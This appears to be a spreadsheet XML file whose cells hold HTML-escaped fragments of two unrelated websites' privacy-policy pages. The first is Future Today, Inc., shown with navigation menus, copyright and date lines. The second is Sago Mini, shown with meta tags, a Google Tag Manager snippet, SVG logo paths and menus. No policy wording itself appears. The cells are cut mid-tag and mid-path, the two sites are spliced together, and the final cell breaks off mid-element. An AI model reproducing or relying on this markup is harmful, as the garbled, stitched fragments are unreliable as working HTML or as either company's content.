&lt;li id="nav-menu-item-22273-64373cd8699eb" class="mega-menu-item nav-item menu-item-depth-0 has-submenu "&gt;&lt;a href="#" class="menu-link main-menu-link item-title"&gt;&lt;span&gt;Partner with Us&lt;/span&gt;&lt;div class="has-submenu-icon"&gt;&lt;i class="menu-plus ion ion-md-add"&gt;&lt;/i&gt;&lt;i class="menu-chevron ion ion-ios-arrow-down"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/a&gt;
&lt;div class="sub-nav"&gt;&lt;ul class="menu-depth-1 sub-menu sub-nav-group" &gt;
	&lt;li id="nav-menu-item-23375-64373cd869ae7" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/advertise-with-us/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Advertise With Us&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
	&lt;li id="nav-menu-item-22271-64373cd869bd8" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/distribute-your-content/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Distribute Your Content&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li id="nav-menu-item-22274-64373cd869d0b" class="mega-menu-item nav-item menu-item-depth-0 has-submenu "&gt;&lt;a href="#" class="menu-link main-menu-link item-title"&gt;&lt;span&gt;Media&lt;/span&gt;&lt;div class="has-submenu-icon"&gt;&lt;i class="menu-plus ion ion-md-add"&gt;&lt;/i&gt;&lt;i class="menu-chevron ion ion-ios-arrow-down"&gt;&lt;/i&gt;&lt;/div&gt;&lt;/a&gt;
&lt;div class="sub-nav"&gt;&lt;ul class="menu-depth-1 sub-menu sub-nav-group" &gt;
	&lt;li id="nav-menu-item-22487-64373cd869dc3" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/press-releases/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Press Releases&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
	&lt;li id="nav-menu-item-22485-64373cd869eec" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/media-coverage/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Media Coverage&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
	&lt;li id="nav-menu-item-22486-64373cd86a019" class="mega-menu-item sub-nav-item menu-item-depth-1 "&gt;&lt;a href="http://futuretodayinc.com/media-kit/" class="menu-link sub-menu-link"&gt;&lt;span&gt;Media Kit&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;            &lt;/div&gt;
            &lt;!--</t>
  </si>
  <si>
    <t>Copyright --&gt;
            &lt;div class="copyright"&gt;
                © 2021, Future Today, Inc.                 &lt;br&gt;
                All right reserved.             &lt;/div&gt;
            &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Social links --&gt;
                    &lt;/div&gt;
        &lt;!-- Mobile social icons --&gt;
            &lt;/div&gt;
&lt;/nav&gt;
&lt;ul class="menu-optional"&gt;
	&lt;li class="btn-optional-holder"&gt;
			&lt;a href="http://futuretodayinc.com/contact-us/" class="btn btn-small btn-optional" target="_blank"&gt;
		Contact Us	&lt;/a&gt;
	&lt;/li&gt;
		&lt;/ul&gt;
													&lt;div class="mobile-hamburger"&gt;
&lt;!-- Fullscreen --&gt;
&lt;div class="clb-hamburger btn-round btn-round-light dark-mode-reset" tabindex="1"&gt;
	&lt;i class="ion"&gt;
		&lt;a href="#" class="clb-hamburger-holder" aria-controls="site-navigation" aria-expanded="false"&gt;
			&lt;span class="_shape"&gt;&lt;/span&gt;
			&lt;span class="_shape"&gt;&lt;/span&gt;
		&lt;/a&gt;	
	&lt;/i&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;					&lt;/div&gt;
	            &lt;div class="close-menu"&gt;&lt;/div&gt;
	        &lt;/div&gt;
    	&lt;/div&gt;
	&lt;/div&gt;
&lt;/header&gt;
		&lt;div id="content" class="site-content" data-mobile-menu-resolution="768"&gt;
&lt;div class="page-container"&gt;
	&lt;div id="primary" class="content-area"&gt;
		&lt;div class="page-content "&gt;
			&lt;main id="main" class="site-main"&gt;
			&lt;article id="post-22963" class="post-22963 page type-page status-publish hentry"&gt;
	&lt;div class="entry-content"&gt;
		&lt;section data-vc-full-width="true" data-vc-full-width-init="false" class="vc_section vc_custom_1620208204330 vc_section-has-fill"&gt;&lt;div data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid vc_column-gap-35 vc_row-o-equal-height vc_row-o-content-middle vc_row-flex"&gt;&lt;div class="wpb_column vc_column_container vc_col-sm-8"&gt;&lt;div class="vc_column-inner vc_custom_1592462417874"&gt;&lt;div class="wpb_wrapper"&gt;&lt;div class="vc_empty_space"   style="height: 200px"&gt;&lt;span class="vc_empty_space_inner"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="ohio-heading-sc heading text-left"
	id="ohio-custom-64373cd87618c" 
				&gt;
	&lt;h1 class="title"&gt;
		Privacy Policy	&lt;/h1&gt;
			&lt;p class="subtitle"&gt;
					&lt;/p&gt;
&lt;/div&gt;&lt;div class="vc_empty_space"   style="height: 130px"&gt;&lt;span class="vc_empty_space_inner"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="wpb_column vc_column_container vc_col-sm-4"&gt;&lt;div class="vc_column-inner"&gt;&lt;div class="wpb_wrapper"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="vc_row-full-width vc_clearfix"&gt;&lt;/div&gt;&lt;/section&gt;&lt;div class="vc_row-full-width vc_clearfix"&gt;&lt;/div&gt;&lt;section data-vc-full-width="true" data-vc-full-width-init="false" class="vc_section vc_custom_1616782685686 vc_section-has-fill"&gt;&lt;div class="vc_row wpb_row vc_row-fluid vc_row-o-equal-height vc_row-flex"&gt;&lt;div class="wpb_column vc_column_container vc_col-sm-12"&gt;&lt;div class="vc_column-inner"&gt;&lt;div class="wpb_wrapper"&gt;&lt;div class="vc_empty_space"   style="height: 32px"&gt;&lt;span class="vc_empty_space_inner"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="top" class="vc_row wpb_row vc_row-fluid vc_row-o-equal-height vc_row-flex"&gt;&lt;div class="wpb_column vc_column_container vc_col-sm-12"&gt;&lt;div class="vc_column-inner"&gt;&lt;div class="wpb_wrapper"&gt;&lt;div class="ohio-text-sc " 
	id="ohio-custom-64373cd876f45" 
				&gt;
	&lt;p&gt;Effective on: May 25, 2018&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;Last updated on: April 22, 2021&lt;/p&gt;
&lt;/div&gt;&lt;div class="vc_empty_space"   style="height: 30px"&gt;&lt;span class="vc_empty_space_inner"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;&lt;html lang="en" class="block-scroll"&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt;&lt;meta charset="utf-8"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=IE9"&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1, ui-minimal"&gt;&lt;title&gt;Privacy Policy | Sago Mini&lt;/title&gt;&lt;meta name="title" content="Privacy Policy | Sago Mini"&gt;&lt;meta name="description" content="Looking for our Sago Mini privacy policy? At Sago Mini, we take your privacy seriously. To learn more about how we protect our customers privacy, contact us today!"&gt;&lt;meta property="og:title" content="Privacy Policy | Sago Mini"&gt;&lt;meta property="og:url" content="https://sagomini.com/privacy-policy/"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:image" content="https://sagomini.com/workspace/uploads/config/share-1475272796.jpg"&gt;&lt;meta property="og:image:</t>
  </si>
  <si>
    <t>url" content="https://sagomini.com/workspace/uploads/config/share-1475272796.jpg"&gt;&lt;meta property="og:image:width" content="1200"&gt;&lt;meta property="og:image:height" content="628"&gt;&lt;meta property="og:description" content="Looking for our Sago Mini privacy policy? At Sago Mini, we take your privacy seriously. To learn more about how we protect our customers privacy, contact us today!"&gt;&lt;link rel="dns-prefetch" href="//watermark.deuxhuithuit.com"&gt;&lt;link rel="dns-prefetch" href="//www.google-analytics.com"&gt;&lt;link rel="canonical" href="https://sagomini.com/privacy-policy/"&gt;&lt;link rel="shortcut icon" href="https://sagomini.com/favicon.ico" type="image/vnd.microsoft.icon"&gt;&lt;link rel="icon" href="https://sagomini.com/favicon.ico" type="image/ico"&gt;&lt;link rel="icon" href="https://sagomini.com/favicon.png" type="image/png"&gt;&lt;link rel="apple-touch-icon" href="https://sagomini.com/favicon.png" type="image/png"&gt;&lt;link rel="pavatar" href="https://sagomini.com/favicon.png" type="image/png"&gt;&lt;meta name="msapplication-TileImage" content="https://sagomini.com/favicon.png"&gt;&lt;link rel="author" href="https://sagomini.com/humans.txt"&gt;&lt;script&gt;
var dataLayer = dataLayer ||</t>
  </si>
  <si>
    <t>[];
dataLayer.push({'page':{'language':'en'}});
&lt;/script&gt;&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
 var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;
f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-W8VDBB');&lt;/script&gt;&lt;link rel="stylesheet" type="text/css" href="/workspace/assets/css/sago.min.2.12.0.css" integrity=""&gt;&lt;/head&gt;&lt;body class="en page-index-detail min-width-screen-ip" data-version="2.12.0"&gt;&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-W8VDBB" height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;&lt;div id="site"&gt;&lt;div data-close-state-add-class="transparent" class="fixed fill bg-color-white z-index-max flexbox flex-center || transparent-when-is-loaded transition-opacity transition-duration-short transition-ease-quad-out js-site-loader js-site-loader-close-ended-anim-ref target"&gt;&lt;div data-component-name="element-loader" class="relative || square-very-thin"&gt;&lt;div class="absolute fill"&gt;&lt;div class="absolute width-1_4 padding-top-1_4 border-radius-full bg-color-medium anim-loader-circle || circle-1 top left"&gt;&lt;/div&gt;&lt;div class="absolute width-1_4 padding-top-1_4 border-radius-full bg-color-medium anim-loader-circle || circle-3 top right"&gt;&lt;/div&gt;&lt;div class="absolute width-1_4 padding-top-1_4 border-radius-full</t>
  </si>
  <si>
    <t>bg-color-medium anim-loader-circle || circle-5 bottom right"&gt;&lt;/div&gt;&lt;div class="absolute width-1_4 padding-top-1_4 border-radius-full bg-color-medium anim-loader-circle || circle-7 bottom left"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="absolute fill rotate-neg-45deg"&gt;&lt;div class="absolute width-1_4 padding-top-1_4 border-radius-full bg-color-medium anim-loader-circle || circle-2 top right"&gt;&lt;/div&gt;&lt;div class="absolute width-1_4 padding-top-1_4 border-radius-full bg-color-medium anim-loader-circle || circle-4 bottom right"&gt;&lt;/div&gt;&lt;div class="absolute width-1_4 padding-top-1_4 border-radius-full bg-color-medium anim-loader-circle || circle-6 bottom left"&gt;&lt;/div&gt;&lt;div class="absolute width-1_4 padding-top-1_4 border-radius-full bg-color-medium anim-loader-circle || circle-8 top left"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;header class="site-header site-header-padding-bottom-from-xs bg-color-white relative z-index-1000 js-site-header" role="menubar"&gt;&lt;nav id="site-nav" role="menu" class="flexbox flex-align-items-center height-thinner height-thin-from-xs bg-color-white relative z-index-100000"&gt;&lt;div class="relative width-full js-site-nav-ref"&gt;&lt;div class="bg-color-white js-site-nav absolute top left right z-index-1000 js-auto-toggle-class-on-scroll js-fix-scroll-right" data-toggle-class-on-scroll-add-after="fixed" data-toggle-class-on-scroll-remove-before="fixed" data-toggle-class-on-scroll-remove-after="absolute" data-toggle-class-on-scroll-add-before="absolute" data-toggle-class-on-scroll-ref=".js-site-nav-ref"&gt;&lt;div class="width-full max-width-xl padding-horizontal-small padding-horizontal-largest-from-sm border-box margin-horizontal-auto || flexbox flex-justify-space-between flex-align-items-center"&gt;&lt;a role="menuitem" class="js-header-logo" href="/"&gt;&lt;span&gt;&lt;i class="block max-width-thin"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="svg-icon block width-full" x="0px" y="0px" width="166" height="39" viewBox="0 0 166 39"&gt;&lt;path fill="#FC69C3" d="M149.4.7C142 .4 133.8.5 126.7.5s-13.4-.1-22.3.3c-9 .4-16.1 6.1-16.5 18.6-.1 4.6.8 8.6 2.7 11.7-1.4 1.8-3.4 4.7-3.8 5.4-.4.7.2.7.7.6.4-.1 3.9-1.6 6.1-2.5 2.8 2.4 6.5 3.8 10.9 3.9 5.6.2 13.4.1 21.6.1s15.5.2 23.9-.1c7.5-.3 15.2-7.3 15.2-18.3C165.1 7.4 157 1 149.4.7zm-28.1 27.8c0</t>
  </si>
  <si>
    <t>.9-.5 1.9-1.4 2.2-.7.2-2.1.2-2.7 0-.6-.3-1.4-.6-1.5-2-.1-.9-.3-6.4-.4-8.5-.2-2.1-3-1.8-3.2-.2-.1.9-.1 7.4-.2 8.5-.1 1.1-.1 1.6-.9 2.1-.9.6-3.1.8-4.1.1-.8-.6-.9-1.6-1-2.4-.1-1.3 0-7.2-.2-8.2-.2-1.7-3-1.8-3.2.1-.1 1.1-.2 7.5-.3 8.2-.2 1.5-.5 2-1.2 2.4-.8.5-3.1.5-3.7-.1-.6-.6-.8-1-.9-2.4-.1-1.1 0-5 0-6.1s0-5.6.3-7c.3-1.6 1.7-2.2 2.7-2.2 1.5-.1 1.9.5 2.2 1.2.1.2.2.1.3 0 .6-.7</t>
  </si>
  <si>
    <t>2.3-1.3 3.9-1.3 2.9 0 3.5 1.6 3.8 1.8.2.2.3.2.6 0 .6-.5 1.6-2.1 5.6-2 3.2.1 4.7 2 5 5 .5 3.2.6 7.9.5 10.8zm7.9.5c-.1 1.1-.6 1.6-1.2 1.8-.7.3-2 .3-2.8.1-.6-.1-1.1-.4-1.2-1.7-.1-1.4-.3-12.3-.2-13 .1-1 .8-1.8 1.7-2 .7-.1 1.7-.1 2.5.1s1 1.2 1.1 2.3c.1 1.1.2 11 .1 12.4zm-2.5-17.1c-1.8.1-3-1.3-3-3s1-3 2.8-3c1.8 0 3 1.4 3 3.1s-.9 2.8-2.8 2.9zm20.2 16.4c-.1 1.2-.4 1.9-1.1 2.3-.7.3-1.8.6-2.7.4-.9-.2-1.7-.4-2-2.3-.2-1.5.1-7.8-.4-9.1-.7-1.8-3.5-1-3.8.1-.3 1.5.1 7.5-.2 9.4-.1.8-.6 1.4-1.2 1.6s-1.5.3-2.3.1c-.7-.2-1.3-.2-1.6-2-.1-.9-.6-12.5 0-14.2.6-1.8 3.3-1.6 4.3-.2 1.2-.9 2.9-1.5 5.4-1.3 3.3.2 5.1 2.5 5.3 5.4.3 2.4.4 8.4.3 9.8zm5.2-22.4c1.8 0 3 1.4 3 3.1s-.9 2.8-2.8 2.9c-1.8.1-3-1.3-3-3s1-2.9 2.8-3zm3 22.4c-.2 1.1-.5 1.8-1.2 2.3-.6.5-2.2.4-2.8.2-.7-.2-1.1-1-1.3-2.1-.2-1.3-.3-11.7-.1-12.4.1-1 .8-1.9 1.7-2.1.7-.1 1.7-.2 2.5.2.9.4 1 1.1 1.1 2.4.1.9.4 9.9.1 11.5z"&gt;&lt;/path&gt;&lt;path fill="#72BE44" d="M82.7 19.9c-.1-4.7.1-13.7-.1-16.7-.1-.9-.6-1.5-1.9-1.5h-6.9c-1.1 0-6.5.1-7.1.1-1 0-1.9.4-2.1 1.6-.2 1.2-.1 11.5 0 15.6.1</t>
  </si>
  <si>
    <t>3.8 0 14.8.3 17.4.1.9.6 1.7 1.8 1.9.9.1 5.6.1 7.2 0 1.3 0 5.4 0 6.7-.1 1.6-.1 2.3-.5 2.3-2.7-.1-2.1-.1-11.4-.2-15.6zm-6.8 10.6c0 .2 0</t>
  </si>
  <si>
    <t>.2-.2.2-.5.1-3.6.2-4 .1-.1 0-.2 0-.2-.2-.1-.7-.2-5.5-.2-9.3 0-4.5-.2-8.8-.2-9 0-.3 0-.4.3-.4.4 0 3.5-.2 3.8-.2s.4 0 .4.3c.1.5.2 5 .3 9.4v9.1z"&gt;&lt;/path&gt;&lt;path fill="#FAA61A" d="M43.4 3.5c.1-.7.3-1.4 1.7-1.4.7 0 12.2-.2 12.6-.2.6.1 1 .3 1 1 0</t>
  </si>
  <si>
    <t>.5.2 5.3.1 6.2-.1.5 0 .7-.4.7-1.1.1-7.1.1-7.6.1-.2 0-.3 0-.3.3 0 .5.1 8.6.1 9.7v11.5c0</t>
  </si>
  <si>
    <t>.3 0 .5.3.5.4 0 4.3-.2 5-.2.2 0</t>
  </si>
  <si>
    <t>.3-.1.3-.5 0-1-.1-5.2-.1-6.5 0-.2 0-.4-.2-.4h-1.8c-.5 0-.7-.1-.8-.7-.1-.7-.1-4.4-.1-5.3 0-.8.4-.8.8-.8s5.7-.1 6-.1c.5 0 1 .2 1 .7 0 .8 0</t>
  </si>
  <si>
    <t>9.3.1 10.1 0 .8.1 7.4.1 8.4 0 1.1-.5 1.4-1.1 1.4s-6 .1-7.2.1c-1.4 0-6.4.1-7.3.1-.8 0-1.5-.4-1.7-1.4-.1-.5-.3-11.6-.3-16-.1-6.1-.3-16.6-.2-17.3z"&gt;&lt;/path&gt;&lt;path fill="#51BEB5" d="M40.6 37.9c0-.4-1.2-15.8-1.4-17.5C39 18.1 37.6 4 37.1 2.1c-.2-.7-.6-.8-1.4-.9H25.6c-1.2 0-1.5.4-1.7 1.3-.5 2.7-1.5 11.8-1.9 15.9-.4 4.4-1.5 18.3-1.5 18.9 0</t>
  </si>
  <si>
    <t>.4.1.4.5.5.9.1 6 .2 6.4.2.6 0 .6-.4.6-.7.1-.9 0-4.1.1-4.6 0-.2.1-.3.4-.3h4c.4.1.4.3.4.5V38c0 .4.3.7.9.7.6 0 5.9.1 6.6 0 .4-.1.2-.3.2-.8zm-7.9-12.7c0 .3 0 .7-.4.7-.5.1-2 .1-2.6.1-.3 0-.5.1-.5-.4-.2-1.4-.1-10.5 0-11.4 0-.3 0-.4.3-.4s2.4-.1 2.7-.1c.3 0</t>
  </si>
  <si>
    <t>.4 0 .4.4 0 1.9.1 9.6.1 11.1z"&gt;&lt;/path&gt;&lt;path fill="#FC7A38" d="M15.2 1c1.3.1 2.5.9 2.6 2.1.1 1 .1 7.4.1 7.9-.1.5-.2.7-1 .7-.7 0-4.8 0-5.3-.1-.6-.1-.8-.3-.8-1.1 0-.5.1-1.5.1-1.8 0-.4-.1-.9-.8-1.1-.5-.2-.8-.1-1.3 0S8 8.2 8 8.7c-.1.6 0 3</t>
  </si>
  <si>
    <t>.2 3.6.2.6.4 1 1 1.4.8.7 5.8 4.1 6.6 4.9.9.8 2.3 2.8 2.4 5.1v5.4c0 2.3-.1 4.5-.2 5.2-.4 3.1-2.1 3.7-4.2 3.8-.9 0-7.8 0-8.8-.1-2.1 0-3.3-1-3.6-3.7-.1-1.4-.3-5.5-.2-6.1.1-.6.3-.8 1-.9.7 0 4.9 0 5.6.1.4.1.7.2.7.6.1.7 0 1.6.1 2.2s.4 1 .7 1.1c.4.2 1.1.2 1.4.1.4-.1.6-.3.7-.9.2-1.3.4-4.3-.8-6.3-.6-1.2-5.7-4-6.6-4.6-1.6-1.1-2.7-2.5-2.9-4.4-.3-1.9-.2-10.7 0-12 .2-1 1.1-2 2.6-2.2 2-.3 9.5-.2 11.5 0z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/i&gt;&lt;/span&gt;&lt;/a&gt;&lt;div class="hidden flexbox-from-xs margin-right-neg-small || js-header-menu"&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/First Words" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/first-words/"&gt;First Words&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/School" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/school/"&gt;School&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/World" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/world/"&gt;World&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Printables" target="_self" class="js-nav-link btn-page-printables nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/printables/"&gt;Printables&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/About Us" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/our-story/"&gt;About Us&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Characters" target="_self" class="js-nav-link btn-page-characters nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/characters/"&gt;Characters&lt;/a&gt;&lt;/div&gt;&lt;a target="_blank" class="width-tiny width-very-tiny-from-xs flexbox flex-center transition-site-nav-account-icon padding-smallest padding-smaller-from-sm" href="https://account.sagomini.com/"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="width-full overflow-visible block" style="height: 30px;" preserveAspectRatio="xMidYMin slice" viewBox="0 0 30</t>
  </si>
  <si>
    <t>30"&gt;&lt;path d="M14.7 14.6a4.3 4.3 0 100-8.6 4.3 4.3 0 000 8.6zM21.4 23H8.1c-.6 0-1.1-.5-1.1-1.1 0-3.5 2.8-6.3 6.3-6.3h2.9c3.5 0 6.3 2.8 6.3 6.3 0 .6-.5 1.1-1.1 1.1z" fill="currentColor"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="font-base text-miniature text-shortest-from-ph text-very-short-from-xs text-shorter-from-sm text-short-from-md line-height-tighter letter-spacing-half || color-dark hidden-from-xs flexbox flex-align-items-center || js-header-menu"&gt;&lt;a target="_blank" class="width-tiny width-very-tiny-from-xs flexbox flex-center transition-site-nav-account-icon padding-smallest padding-smaller-from-sm" href="https://account.sagomini.com/"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="width-full overflow-visible block" style="height: 30px;" preserveAspectRatio="xMidYMin slice" viewBox="0 0 30</t>
  </si>
  <si>
    <t>30"&gt;&lt;path d="M14.7 14.6a4.3 4.3 0 100-8.6 4.3 4.3 0 000 8.6zM21.4 23H8.1c-.6 0-1.1-.5-1.1-1.1 0-3.5 2.8-6.3 6.3-6.3h2.9c3.5 0 6.3 2.8 6.3 6.3 0 .6-.5 1.1-1.1 1.1z" fill="currentColor"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;button class="padding-small js-menu-toggle"&gt;&lt;div class="flexbox flex-center"&gt;&lt;i class="block custom-burger-square relative"&gt;&lt;div class="absolute fill js-menu-fullscreen transition-burger"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="width-full overflow-visible block" style="height: 100%;" preserveAspectRatio="xMidYMin slice" viewBox="0 0 30 30"&gt;&lt;rect x="3" y="7" width="24" height="4" rx="2" fill="#55504F"&gt;&lt;/rect&gt;&lt;rect x="3" y="13" width="24" height="4" rx="2" fill="#55504F"&gt;&lt;/rect&gt;&lt;rect x="3" y="19" width="24" height="4" rx="2" fill="#55504F"&gt;&lt;/rect&gt;&lt;/svg&gt;&lt;/div&gt;&lt;div class="absolute fill js-menu-fullscreen transition-close-menu"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="width-full overflow-visible block" style="padding-bottom: 100%; height: 1px;" preserveAspectRatio="xMidYMin slice" viewBox="0 0 30 30"&gt;&lt;rect x="7.829" y="5" width="24" height="4" rx="2" transform="rotate(45 7.829 5)" fill="#FC7A38"&gt;&lt;/rect&gt;&lt;rect x="24.799" y="7.828" width="24" height="4" rx="2" transform="rotate(135 24.8 7.828)" fill="#FC7A38"&gt;&lt;/rect&gt;&lt;/svg&gt;&lt;/div&gt;&lt;/i&gt;&lt;/div&gt;&lt;/button&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="js-auto-sync-property" data-sync-property="height" data-sync-property-from-common-ancestor="#site-nav" data-sync-property-from=".js-site-nav"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/nav&gt;&lt;nav class="display-none-from-xs translate-y-minus-full translate-y-none-when-is-opened transition-transform transition-duration-short transition-ease-quad-out bg-color-white fixed fill z-index-10000 overflow-y-auto js-menu-fullscreen"&gt;&lt;div class="margin-top-xlarger"&gt;&lt;div class="text-center margin-top-xlarge"&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/First Words" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-vertical-smallest bold-to-xs" href="/first-words/"&gt;First Words&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/School" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-vertical-smallest bold-to-xs" href="/school/"&gt;School&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/World" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-vertical-smallest bold-to-xs" href="/world/"&gt;World&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Printables" target="_self" class="js-nav-link btn-page-printables nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-vertical-smallest bold-to-xs" href="/printables/"&gt;Printables&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/About Us" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-vertical-smallest bold-to-xs" href="/our-story/"&gt;About Us&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base text-shorty text-shorter-from-xs text-very-short-from-md line-height-loose letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Characters" target="_self" class="js-nav-link btn-page-characters nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-vertical-smallest bold-to-xs" href="/characters/"&gt;Characters&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="width-full max-width-xl padding-horizontal-small padding-horizontal-largest-from-sm border-box margin-horizontal-auto || flexbox flex-center padding-top-largest"&gt;&lt;nav data-component-name="button-social-icons" class="flexbox flex-wrap flex-justify-center margin-left-minus-smallest"&gt;&lt;a class="color-orange color-active-on-hover transition-color transition-duration-short transition-ease-out padding-micro block padding-left-smallest border-box 